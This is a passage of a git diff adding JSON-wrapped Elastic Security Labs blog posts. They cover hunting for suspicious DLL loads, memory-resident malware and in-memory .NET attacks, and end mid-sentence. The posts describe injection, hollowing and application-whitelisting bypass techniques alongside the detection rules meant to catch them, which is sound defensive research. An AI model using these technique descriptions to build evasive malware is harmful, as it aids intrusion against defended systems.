Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)\n\n### Rundll32 or Regsvr32 Executing an oversized File\n\nThe following EQL query correlates creation of an executable file event with file size equal or greater than 100MB (this threshold can be adjusted to your environment) subsequently followed by being loaded as a DLL via rundll32 or regsvr32:\n\n\n\nBelow are examples of malicious control panel (CPL) files with sizes over 700MB, a technique used to bypass AV file scanning and reputation-based cloud services that implement a maximum file size for uploaded files:\n\n\n\n### Rundll32 or Regsvr32 loading a DLL with a suspicious original file name\n\nSome malicious DLLs have a suspicious original file name, such as ending with .EXE extension or with a great mismatch between the length of the original file name and the actual DLL name. This kind of defense evasion is less common and is employed by a good number of known malware families:\n\n\n\nA few examples:\n\n\n\n## DLL via Disk Images\n\nEmbedding malicious payloads in virtual disk images isn’t new or particularly novel, but the technique has gained in popularity among commodity malware families.\n\n### Suspicious ImageLoad from an ISO Mounted Device\n\nThe following rule looks for the execution of commonly-abused Windows binaries to load a DLL from a mounted virtual disk image:\n\n\n\nBelow are some example of the technique:\n\n\n\n### Suspicious Microsoft Image Loaded from a Disk Image\n\nThe following rule is triggered when an executable, running from a mounted virtual disk image (.vhd, .iso), loads a suspicious Microsoft-signed DLL such as the taskschd, bitsproxy or vaultclient modules that are associated with some common malware capabilities like persistence, credential access, and evasion.\n\n\n\nThis query identifies many commodity malware families delivered via ISO files:\n\n\n\n### Potential DLL SideLoad via a Renamed Signed Binary\n\nThe following query identifies attempts to load an unsigned DLL from a mounted virtual disk (.iso, .vhd) and using a renamed signed binary (original file name is different than the process name).\n\n\n\nThis depicts some examples of matches where a signed and renamed program is loading a DLL from a mounted disk image:\n\n\n\n### Potential DLL SideLoad via a Microsoft Signed Binary\n\nThis detection identifies attempts to load unsigned DLLs from a mounted virtual disk (.iso, .vhd) and using a signed Microsoft binary:\n\n\n\nBelow is an example in which Microsoft OneDrive and Windows Control Panel executables are abused to sideload malicious modules for initial access and execution.\n\n\n\n## DLL from Archive Files\n\nSimilarly to virtual disk images, attackers can also use ZIP/RAR archive files with embedded malicious DLL paired with a trusted binary or a shortcut (LNK) file to gain access.\n\n\n\nThe following screen capture shows how this query identifies a malicious file from a RAR archive which was auto-extracted into a temporary user directory. This scenario is moderately common.\n\n\n\n## DLL via Malicious Documents\n\nMicrosoft Office documents can be also used to deploy and load a malicious DLL to avoid spawning a suspicious child process. The following query correlates an executable (PE) file creation event with a DLL load event.\n\n\n\nBelow are some examples of malicious Word and Excel documents using this delivery technique.\n\n\n\n## DLL via MSIEXEC\n\nMsiExec is another great option when you need to execute malicious DLLs because this activity blends in well with legitimate software installers. Two observed delivery methods are:\n\n- Calling the DLLRegisterServer export from a random DLL using the command-line arguments /y or /z as documented here\n- Build an installer that uses custom actions to load and execute a DLL as documented here and here\n\nThe following query can be used to identify the execution of the built-in Windows Installer, MSIEXEC, to call the exported function and run code:\n\n\n\nExamples where MSI is used to load malicious DLLs:\n\n\n\nDLLs delivered via Windows Installer custom actions can be detected by correlating a DLL file creation event where the calling process is MsiExec and where that DLL is subsequently loaded by the same MsiExec process.\n\nIt's worth noting that there are some legitimate uses of Windows Installer custom actions and this query may require some filtering in environments where those are used.\n\n\n\nThe following query matches the Gwisin Ransomware documented by [AhnLab](https://asec.ahnlab.com/en/37483/) and for which a [PoC](https://github.com/ChoiSG/GwisinMsi) has been created.\n\n## DLL delivery via lolbins\n\nSome malware relies on trusted Microsoft binaries to download, decode or extract DLLs. This query correlates PE file creation or modification by common built-in tools, followed by an image load.\n\n\n\nExamples of malware identified using this detection approach:\n\n\n\n## DLL sideload into existing program\n\nThe following detection identifies attempts to load a recently-created and unsigned DLL file by an already existing signed process within the same current directory. Comparing the difference between the creation time of the existing program and the DLL creation time we can spot these kinds of anomalies.\n\n\n\nThe next example matches when the malicious secure32.dll process (created 28 seconds ago) is written to the current OneDrivedirectory and automatically loaded by OneDrive.exe (created 2.5 years ago):\n\n\n\n## DLL loading from suspicious directories\n\nDropping a DLL to a user-writable directories and side loading that with a trusted binary is also a common pattern. The following query looks for this behavior and, by leveraging relative creation and modification times, it can reduce the alerts volume while limiting those to a time window following initial execution.\n\n\n\nThe most commonly-targeted user-writable directories are `?:\\Users\\Public` and `?:\\ProgramData`. The full query containing more than 70 suspicious folders can be found [here](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml).\n\nBelow see a example depicting malicious matches where various trusted binaries were abused to load malicious DLLs: \n\n\n\n## DLL load with a abnormal creation time\n\nAnother interesting scenario is identifying a DLL load event where the DLL has a suspicious creation time, and which could be a result of timestomping. This query compares inconsistencies between the creation time and filename modification time using dll.Ext.relative_file_name_modify_time and dll.Ext.relative_file_creation_time immediately followed by an image load: \n\nThe following is an example where malware drop DLLs in trusted directories and then use timestomping to ensure those DLLs blend in with existing files in those directories: \n\n## DLL from removable device\n\nDLL side-loading from a removable device is still a valid infection vector, especially for air-gapped networks. An example was recently shared by [Mandiant](https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia) involving an espionage-oriented threat. The following EQL query can be used to find similar behavior: \n\nHere is an example with several matches: \n\n## Protection Rules\n\nElastic provides significant capabilities for identifying unusual or malicious library load events with existing behavior protection rules that take advantage of Windows Libraries events:\n\n- [NTDLL Loaded from an Unusual Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_ntdll_loaded_from_an_unusual_path.toml)\n- [Suspicious NTDLL Image Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_ntdll_image_load.toml)\n- [DLL Loaded from an Archive File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dll_loaded_from_an_archive_file.toml)\n- [Microsoft Office Loaded a Dropped Executable File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_loaded_a_dropped_executable_file.toml)\n- [Suspicious ImageLoad from an ISO Mounted Device](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_from_an_iso_mounted_device.toml)\n- [Potential Evasion via Oversized Image Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_evasion_via_oversized_image_load.toml)\n- [Suspicious ImageLoad via Windows Update Auto Update Client](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_via_windows_update_auto_update_client.toml)\n- [Privilege Escalation via Microsoft Exchange DLL Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_privilege_escalation_via_microsoft_exchange_dll_hijacking.toml)\n- [Potential DLL SideLoad via a Microsoft Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_microsoft_signed_binary.toml)\n- [Potential DLL SideLoad via a Renamed Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_renamed_signed_binary.toml)\n- [Library Load of a File Written by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_library_load_of_a_file_written_by_a_signed_binary_proxy.toml)\n- [Potential DLL Search Order Hijacking of an Existing Program](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_search_order_hijacking_of_an_existing_program.toml)\n- [Suspicious DLLRegisterServer Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_dllregisterserver_execution_via_msiexec.toml)\n- [ImageLoad of a File dropped via SMB](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_imageload_of_a_file_dropped_via_smb.toml)\n- [RunDLL32/Regsvr32 Loads Dropped Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)\n- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)\n- [RunDLL32/Regsvr32 Loads a DLL Downloaded via BITS](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_regsvr32_loads_a_dll_downloaded_via_bits.toml)\n- [Potential Initial Access via DLL Search Order Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_initial_access_via_dll_search_order_hijacking.toml)\n- [Suspicious Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)\n- [Protected Process Light Bypass via DLL Tampering](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_protected_process_light_bypass_via_dll_tampering.toml)\n- [Potential Privilege Escalation via DLL Redirection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_dll_redirection.toml)\n- [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)\n- [Potential Privilege Escalation via Elevated IFileOperation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_elevated_ifileoperation.toml)\n- [Suspicious DLL Loaded by Svchost](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_service_dll_unsigned.toml)\n- [Suspicious DLL Loaded from a Removable Media](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_dll_loaded_from_a_removable_media.toml)\n- [Suspicious Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)\n- [Dynwrapx Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dynwrapx_image_load_via_windows_scripts.toml)\n- [Suspicious Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_image_load_via_windows_scripts.toml)\n- [Potential Image Load with a Spoofed Creation Time](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_image_load_with_a_spoofed_creation_time.toml)\n\n## Conclusion\n\nCompared to detections that rely on process execution events and where adversaries expose more detection opportunities via command-line flags and parent process relationships, designing detections based on DLL events requires more enrichment and correlation to decrease noise rate and increase confidence.\n\nIn this publication we shared numerous examples of how we’re using DLL events to identify threats. You can use the different capabilities Elastic endpoint offers to produce higher signal alerts, too. Given the multitude of methods of delivering malicious code as DLLs, though, relying on behavioral detections alone is not enough. Combining this logic with malware file classification, shellcode detection features, and user-entity based analytics (UEBA) improves the fidelity of this metadata for detection purposes.\n"
+ },
+ "title": "Hunting for Suspicious Windows Libraries for Execution and Defense Evasion",
+ "slug": "Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion",
+ "date": "2023-03-01",
+ "description": "Learn more about discovering threats by hunting through DLL load events, one way to reveal the presence of known and unknown malware in noisy process event data.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-roman-columns.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json
new file mode 100644
index 00000000000..fa1932204c7
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting In Memory\"\nslug: \"hunting-memory\"\ndate: \"2022-06-21\"\ndescription: \"Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack.\"\nauthor:\n - slug: joe-desimone\nimage: \"blog-thumb-generic-black.jpg\"\ncategory:\n - slug: security-research\n---\n\nThreat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack lifecycle. To be successful, hunters must continually hone their subject matter expertise on the latest attacker techniques and detection methods. Memory resident malware, which presents itself in many forms, is an attacker technique that has existed for over a decade. The popularity of memory resident malware has steadily [increased](https://www.cyber.nj.gov/threat-analysis/fileless-evasive-intrusion-tactics-pose-challenge-for-network-defense) over time, possibly resulting from the proliferation of code and knowledge of in memory techniques. More likely, its popularity reflects the success of memory-based techniques to evade detection by security products and practitioners. Once limited to advanced adversaries, memory resident techniques are now commonplace for all levels of adversary sophistication. I will examine the most common of these memory based attacker techniques, and walk through our team’s research to craft a scalable, low noise approach to hunting for adversaries that are hiding in memory.\n\n## Attacker Techniques\n\nBefore I address memory hunting methods to detect adversaries in your network, it is helpful to understand the common forms of memory resident malware. These techniques include shellcode injection, reflective DLL injection, memory module, process and module hollowing, and Gargoyle (ROP/APC).\n\n### SHELLCODE INJECTION\n\nShellcode injection is the most basic in-memory technique and has also been around the longest. The basic ‘recipe’ for shellcode injection is a four step process. These steps are: 1) open a target process (OpenProcess); 2) allocate a chunk of memory in the process (VirtualAllocEx); 3) write the shellcode payload to the newly allocated section (WriteProcessMemory); and 4) create a new thread in the remote process to execute the shellcode (CreateRemoteThread). The venerable [Poison Ivy](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf) malware uses this technique, which is a big reason why so many APT groups were drawn to it over the years.\n\nIf you pull up a Poison Ivy [sample](https://www.virustotal.com/en/file/e0a8e823b446764e2b536e81d3fefaa9a562dd8c0614b3bdb345233de27e216a/analysis/)with x64dbg and set a breakpoint on VirtualAllocEx, you will soon locate the chunk of code responsible for the injection.\n\n\n\n\n\nIn the first image, the push 40 instruction preceding the call to VirtualAllocEx corresponds to page access protection value of PAGE_EXECUTE_READWRITE. In the following screenshot from [ProcessHacker](http://processhacker.sourceforge.net/) of the memory layout of a Poison Ivy implant, you can see it allocates a number of these RWX sections.\n\n\n\nTypical code sections are of type ‘Image’ and map to a file on disk. However, these are type ‘Private’ and do not map to a file on disk. They are therefore referred to as unbacked executable sections or floating code. Threads starting from these types of memory regions are anomalous and a good indicator of malicious activity. ProcessHacker can also show you the call stack of the malware threads. There are multiple functions in the call stack which do not map to memory associated with loaded modules.\n\n\n\n### REFLECTIVE DLL INJECTION\n\nReflective DLL injection, originally developed by [Steven Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection), is another type of in memory attacker technique. Metasploit’s [Meterperter](https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) payload was one of the first attempts to fully weaponize the technique, but many malware families use it today. Reflective DLL injection works by creating a DLL that maps itself into memory when executed, instead of relying on the Window’s loader. The injection process is identical to shellcode injection, except the shellcode is replaced with a self-mapping DLL. The self-mapping component added to the DLL is responsible for resolving import addresses, fixing relocations, and calling the DllMain function. Attackers benefit from the ability to code in higher level languages like C/C++ instead of assembly.\n\nClassic reflective DLL injection, such as that used by Meterpreter, is easy for hunters to find. It leaves large RWX memory sections in the process, even when the meterpreter session is closed. The start of these unbacked executable memory sections contain the full MZ/PE header, as shown in the images below. However, keep in mind that other reflective DLL implementations could wipe the headers and fix the memory leak.\n\n\n\n\n\nThe DLLs loaded in memory also conveniently export a self-describing function called ReflectiveLoader().\n\n### \n\n### MEMORY MODULE\n\n[Memory module](https://github.com/fancycode/MemoryModule) is another memory resident attacker technique. It is similar to Reflective DLL injection except the injector or loader is responsible for mapping the target DLL into memory instead of the DLL mapping itself. Essentially, the memory module loader re-implements the LoadLibrary function, but it works on a buffer in memory instead of a file on disk. The original implementation was designed for mapping in the current process, but updated techniques can map the module into [remote processes](https://github.com/DarthTon/Blackbone). Most implementations respect the section permissions of the target DLL and avoid the noisy RWX approach.\n\n[NetTraveler](https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests) is one malware family that uses a memory module style technique. When NetTraveler starts, it unpacks the core functionality and maps it into memory. The page permissions more closely resemble a legitimate DLL, however the memory regions are still private as opposed to image.\n\n\n\nThe active threads have start addresses at these private regions. The callstack also reveals these malicious sections.\n\n\n\n[Winnti](https://hitcon.org/2016/pacific/0composition/pdf/1201/1201%20R2%201610%20winnti%20polymorphism.pdf) is yet another malware sample that uses the Memory Module technique. They had a minor slip on the section permissions of the first page, as you can see below.\n\n\n\nHowever, the Winnti sample was notable because the MZ/PE headers in the DLL were erased, making it more difficult to detect.\n\n\n\n### PROCESS HOLLOWING\n\nProcess hollowing is another technique attackers use to prevent their malware from being detected by security products and hunters. It involves creating a suspended process, unmapping (hollowing) the original executable from the process, allocating and writing a new payload to the process, redirecting the execution of the original thread to the new payload with SetThreadContext, and finally calling ResumeThread to complete. More stealthy variants use Create/Map section APIs to avoid WriteProcessMemory. Others modify the entry point with a jump instead of using SetThreadContext.\n\n[DarkComet](https://journeyintoir.blogspot.com/2015/02/process-hollowing-meets-cuckoo-sandbox.html) is one of many malware families that use process hollowing techniques. Several artifacts can be used to detect process hollowing. One dead giveaway for this activity is a process being spawned with the CREATE_SUSPENDED flag, as shown in the following screenshot from a DarkComet sample.\n\n\n\n### MODULE OVERWRITING\n\nSo far, all techniques discussed have led to the execution of non-image backed code, and were therefore fairly straightforward to detect. Module overwriting, on the other hand, avoids this requirement, making it much more difficult to detect. This technique consists of mapping an unused module into a target process and then overwriting the module with its own payload. Flame was the first widely publicized malware family to use this technique. More recently, Careto and Odinaff malware families have used module overwriting techniques. Various techniques can be used to reliably detect module overwriting, which involves comparing memory to associated data on disk.\n\n### GARGOYLE\n\n[Gargoyle](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html) is a proof of concept technique for memory resident malware that can evade detection from many security products. It accomplishes this feat by laying dormant with read-only page protections. It then periodically wakes up, using an asynchronous procedure call, and executes a ROP chain to mark its payload as executable before jumping to it. After the payload finishes executing, Gargoyle again masks its page permissions and goes back to sleep. One way to detect this attacker technique is to examine threads and user APCs for evidence of ROP chains.\n\n## Detecting In-Memory Attacks\n\nGiven the proliferation and accessibility of these techniques, security personnel must be vigilant for memory-based attacker techniques and proactively hunt for them on their networks. However, most products cannot generically detect in-memory attacks at scale, leaving defenders with an enormous gap in their ability to protect against these attacks. Endgame has done significant research to bring low-noise detection capabilities into our product for each method mentioned above.\n\nGiven the immense size and impact of this detection gap, it is important to raise all boats, not just those of our customers. For this reason, we collaborated with Jared Atkinson on his powershell tool called [Get-InjectedThreads](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2), which implements a relatively low-noise method of detecting in memory threats. It scans active threads on the system for suspicious start addresses. Hunters leverage it to scan hosts in their networks and quickly identify many memory resident malware techniques. The script works by querying each active thread with the NtQueryInformationThread function to retrieve its start address. The start address is then queried with the VirtualQueryEx function to determine the associated section properties. If the memory region where the thread started is unbacked and executable (i.e. not image type and has execute bit set), then the thread is considered injected. The following screenshot shows a sample detection when run on a system infected with a 9002 RAT [sample](https://www.virustotal.com/en/file/49ac6a6c5449396b98a89709b0ad21d078af783ec8f1cd32c1c8b5ae71bec129/analysis/).\n\n\n\nThe script will catch a variety of malware families leveraging the shellcode injection, reflective DLL, memory module, and some process hollowing techniques. However, it is no replacement for security products that comprehensively prevent in-memory attacks, such as Endgame.\n\n## Enterprise In-Memory Detection at Scale\n\nEndgame has built detections for each of these techniques (and many more) into our enterprise security platform, offering best in market capabilities to locate in-memory threats. We do not simply rely on naïve approaches like monitoring well-known system call sequences for process injection, but efficiently analyze memory to find all known evasion capabilities. This provides our users with thread-level visibility on injected code, as well as sophisticated follow-on actions like examining the injected code and suspending only a malicious injected thread to remediate the threat. Our platform is effective both in stopping injection as it is happening in real time as well as locating already resident adversaries hiding in memory, locating threats across tens of thousands of hosts in seconds.\n\nLike any signatureless detection technique, false positives (FPs) are an important consideration. As we researched and implemented our technique-based preventions for each adversary technique described above, we initially encountered FPs at every step of the way. Handling these correctly in our product is of paramount importance.\n\nMost FPs are related to security software, Just-In-Time (JIT) compiled code, or DRM protected/packed applications. Security products sometimes inject code to some or all processes on the system to enhance their behavioral detection capabilities. The downside is if the product is sloppy in its methods, it can actually [harm](https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf) the security of the system and make hunting for real in memory threats more difficult. JIT code, another potential area for false positives, generates assembly code at runtime which lives in unbacked or floating memory regions. .NET or Java applications are a couple of examples which use JIT techniques. Fortunately, this type of code is easier to identify and filter than rogue security products. Lastly, applications packed or protected with Digital Rights Management (DRM) schemes should be kept in mind. These applications may decrypt or deobfuscate their core functionality in memory to deter debugging and reverse engineering. However, the same techniques are used by malware to evade detection and deter analysis from security practitioners.\n\nThrough careful design decisions and extensive testing, we have managed to achieve very low false positive rates, allowing Endgame users to root out in-memory threats rapidly.\n\n## Conclusion\n\nAdversaries will continue to innovate new techniques to avoid detection and accomplish their objectives. Memory resident techniques are no exception, and have been a thorn in the side of endpoint security defenders for over a decade. Fortunately, by understanding the latest techniques, we can turn the tables and use this knowledge to develop new high fidelity detection methods. At Endgame, our comprehensive approach to these attacks have led us to a market leading position for fileless attack detection (adding to our other key technologies). For more on hunting for in-memory attacks, check out our [slides](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory) from our SANS Threat Hunting and IR Summit presentation.\n"
+ },
+ "title": "Hunting In Memory",
+ "slug": "hunting-memory",
+ "date": "2022-06-21",
+ "description": "Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack.",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "blog-thumb-generic-black.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_memory-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json
new file mode 100644
index 00000000000..957a19363f4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting For In-Memory .NET Attacks\"\nslug: \"hunting-memory-net-attacks\"\ndate: \"2022-06-21\"\ndescription: \"As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection\"\nauthor:\n - slug: joe-desimone\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: security-research\n---\n\n\n\nIn past blog posts, we shared our [approach](https://www.endgame.com/blog/technical-blog/hunting-memory) to hunting for traditional in-memory attacks along with in-depth [analysis](https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) of many injection techniques. As a follow up to my DerbyCon [presentation](https://www.endgame.com/resource/video/derbycon-talk-hunting-memory-resident-malware), this post will investigate an emerging [trend](https://securelist.com/the-rise-of-net-and-powershell-malware/72417/) of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complimentary, and together result in the most robust defense against in-memory attacks.\n\n## The .NET Allure\n\nUsing .NET in-memory techniques, or even standard .NET applications, are attractive to adversaries for several reasons. First and foremost, the [.NET framework](https://en.wikipedia.org/wiki/.NET_Framework) comes [pre-installed](https://blogs.msdn.microsoft.com/astebner/2007/03/14/mailbag-what-version-of-the-net-framework-is-included-in-what-version-of-the-os/) in all Windows versions. This is important as it enables the attackers’ malware to have maximum compatibility across victims. Next, the .NET PE metadata format itself is fairly [complicated](http://www.ntcore.com/files/dotnetformat.htm). Due to resource constraints, many endpoint security vendors have limited insight into the managed (.NET) structures of these applications beyond what is shared with vanilla, unmanaged (not .NET) applications. In other words, most AVs and security products don’t defend well against malicious .NET code and adversaries know it. Finally, the .NET framework has built-in functionality to dynamically load memory-only modules through the [Assembly.Load(byte[])]() function (and its various overloads). This function allows attackers to easily craft crypters/loaders, keep their payloads off disk, and even bypass application whitelisting solutions like [Device Guard](https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies). This post focuses on the Assembly.Load function due to the robust set of attacker capabilities it supports.\n\n## .NET Attacker Techniques\n\nAdversaries leveraging .NET in-memory techniques is not completely new. However, in the last six months, there has been a noticeable uptick in tradecraft, which I’ll briefly discuss to illustrate the danger. For instance, in 2014, DEEP PANDA, a threat group suspected of operating out of China, was [observed](https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/) using the multi-stage MadHatter implant which is written in .NET. More interestingly, this implant exists only in memory after a multi stage Assembly.Load bootstrapping process that begins with PowerShell. PowerShell can directly call .NET methods, and the Assembly.Load function being no exception. It is as easy as calling [System.Reflection.Assembly]::Load($bin). More recently, the [OilRig](https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/) APT Group used a packed .NET malware sample known as ISMInjector to evade signature based detection. During the unpacking routine, the sample uses the Assembly.Load function to access the embedded next stage malware known as [ISMAgent](https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/).\n\nA third example, more familiar to red teams, is [ReflectivePick](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerPick/ReflectivePick/ReflectivePick.cpp) by [Justin Warner](https://twitter.com/sixdub) and [Lee Christensen](https://twitter.com/tifkin_). ReflectivePick allows PowerShell Empire to inject and bootstrap PowerShell into any running process. It leverages the Assembly.Load() method to load their PowerShell runner DLL without dropping it to disk. The image below shows the relevant source code of their tool.\n\n\n\nIt is important to point out that Assembly.Load, being a core function of the .NET framework, is often used in legitimate programs. This includes built-in Microsoft applications, which has led to an interesting string of defense evasion and application whitelisting bypasses. For example, [Matt Graeber](https://twitter.com/mattifestation) discovered a Device Guard bypass that targets a race condition to hijack legitimate calls to Assembly.Load, allowing an attacker to execute any unsigned .NET code on a Device Guard protected host. Because of the difficulty in fixing such a technique, Microsoft currently has decided not to service this issue, leaving attackers a convenient “forever-day exploit” against hosts that are hardened with application whitelisting.\n\n[Casey Smith](https://twitter.com/subTee) also has published a ton of research bypassing application whitelisting solutions. A number of these techniques, at their core, target signed Microsoft applications that call the Assembly.Load method with attacker-supplied code. One example is MSBuild, which comes pre-installed on Windows and allows attackers to execute unsigned .NET code inside a legitimate and signed Microsoft process. These techniques are not JUST useful to attackers who are targeting application whitelisting protected environments. Since they allow attacker code to be loaded into legitimate signed processes in an unconventional manner, most anti-virus and EDR products are blind to the attacker activity and can be bypassed.\n\nFinally, [James Forshaw](https://twitter.com/tiraniddo) developed the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique. At its heart, this technique leverages the BinaryFormatter deserialization method to load a .NET application using only JScript. Interestingly enough, the technique under the hood will make a call to the Assembly.Load method. DotNetToJscript opened the door for many new clever techniques for executing unsigned .NET code in a stealthy manner. For example, James [demonstrated](https://bugs.chromium.org/p/project-zero/issues/detail?id=1081) how to combine DotNetToJScript with [com hijacking](https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com) and Casey’s squiblydoo technique to inject code into [protected processes](http://www.alex-ionescu.com/?p=97). In another example, Casey weaponized DotNetToJScript in universal.js to execute arbitrary shellcode or PowerShell commands.\n\nThe number of Microsoft-signed applications that be can be abused to execute attacker code in a stealthy manner is dizzying. Fortunately, the community has been quick to document and track them publically in a number of places. One good reference is [Oddvar Moe’s](https://twitter.com/Oddvarmoe) [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList), and another is Microsoft’s own [reference](https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-code-integrity-policies-steps).\n\n## Detecting .NET Attacks\n\nAs these examples illustrate, attackers are leveraging .NET in various ways to defeat and evade endpoint detection. Now, let’s explore two approaches to detecting these attacks: on-demand and real-time-based techniques.\n\n### On-demand detection\n\nOn-demand detection leverages snapshots in time-type data collection. You don’t need a persistent agent running and collecting data when the attack takes place, but you do need the malicious code running during the hunt/collection time. The trick is to focus on high-value data that can capture actor-agnostic techniques, and has a high signal-to-noise ratio. One example is the [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) script for detecting traditional unmanaged in-memory injection techniques. To demonstrate detecting .NET malware usage of the Assembly.Load function, I leverage PowerShell Empire by [Will Schroeder](https://twitter.com/harmj0y) and others. Empire allows you to inject an agent into any process by remotely bootstrapping PowerShell. As you see below, after injection calc.exe has loaded the PowerShell core library System.Management.Automation.ni.dll.\n\n\n\nThis fact alone can be interesting, but a surprisingly large number of legitimate applications load PowerShell. Combining this with process network activity and looking for outliers across all your data may give you better mileage. Upon deeper inspection, we see something even more interesting. As shown below, memory section 0x2710000 contains a full .NET module (PE header present). The characteristics of the memory region are a bit unusual. The type is [MEM_MAPPED](), although there is no associated file mapping object (Note the “Use” field is empty in ProcessHacker). Lastly, the region has a protection of PAGE_READWRITE, which surprisingly is not executable. These memory characteristics are a [side effect](https://github.com/dotnet/coreclr/blob/3452efb58d2f3be867080f8627417b264fcbd73c/src/vm/peimagelayout.cpp#L259) of loading a memory-only 